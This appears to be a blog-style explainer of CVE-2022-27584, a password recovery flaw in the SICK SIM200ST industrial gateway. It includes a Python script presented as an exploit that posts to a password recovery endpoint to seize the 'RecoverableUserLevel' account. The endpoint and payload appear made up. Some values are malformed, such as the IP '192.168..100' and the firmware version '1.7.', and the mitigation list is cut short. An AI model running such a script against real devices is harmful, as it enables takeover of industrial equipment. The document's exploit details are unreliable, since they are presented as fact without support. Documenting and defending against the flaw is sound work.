CVE-2022-27584 - Unprotected Password Recovery Lets Attackers Gain Privileges in SICK SIM200ST (Part #1080579)

A significant vulnerability (CVE-2022-27584) was uncovered in the SICK SIM200ST (part number 1080579), an industrial networking device. This flaw allows an unprivileged remote attacker to gain unauthorized user access by abusing the password recovery feature. Exploiting this can grant higher-level privileges and compromise the system’s confidentiality, integrity, and availability. All firmware versions up to and including 1.7. are affected, and no fix is yet available.

Below, you’ll find an easy-to-understand breakdown, sample exploit code with steps, and practical mitigation tips.

What Is SICK SIM200ST?

The SICK SIM200ST is a connectivity gateway used in industrial environments. It lets different machines and sensors communicate on a factory network. Keeping these devices secure is crucial for production continuity and safety.

What’s the Problem?

The SIM200ST includes a “password recovery” mechanism. Normally, this is meant to help authorized users regain access if they forget their credentials. But, in these affected firmware versions, any remote attacker—with no special privileges—can trigger this recovery method and gain access to what the vendor calls a RecoverableUserLevel.

This allows hackers to easily escalate their privileges and potentially take over the device.

Bottom line: If you have SICK SIM200ST on your network, anyone with network access can snatch a user account—repeatably and reliably!

How Does the Exploit Work? (With Code Example)

Attackers exploit the device’s network interface via the password recovery function. The vulnerable HTTP/REST endpoint allows direct triggering of the recovery process.

Here’s a Python example showing how an attacker could exploit this flaw

import requests

# Replace with the IP of your SIM200ST
DEVICE_IP = "192.168..100"
URL = f"http://{DEVICE_IP}/api/password-recovery";

# Insecure: no authentication needed for password reset
payload = {
    "username": "RecoverableUserLevel"
}

response = requests.post(URL, json=payload)

if response.status_code == 200:
    print("Password recovery initiated!")
    print("Response:", response.json())
else:
    print("Request failed:", response.status_code)

This script sends a request to the password recovery endpoint. If the device is vulnerable, it will respond with information that allows the attacker to reset and claim the account.

Official References

- SICK Security Advisory – SIM200ST
- NIST NVD Entry for CVE-2022-27584 *(Check for updates)*
- Vendor Downloads & Documentation

While a fix is planned, there is no patch as of June 2024. Apply these good practices

- Disable device configuration over the network (possible in firmware <=1.7.; check your admin settings)

Conclusion

CVE-2022-27584 is a repeatable, easy-to-exploit flaw that undermines the security of SICK SIM200ST industrial devices. If you operate or manage these devices, take immediate precautions. Review all exposed SIM200STs, restrict their network access, and stay alert for vendor patches or mitigation tips.

Don’t wait—unprotected devices are wide open!

*For updates, stay tuned to official SICK security advisories and NVD entries.*

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 12/16/2022 16:15:00 UTC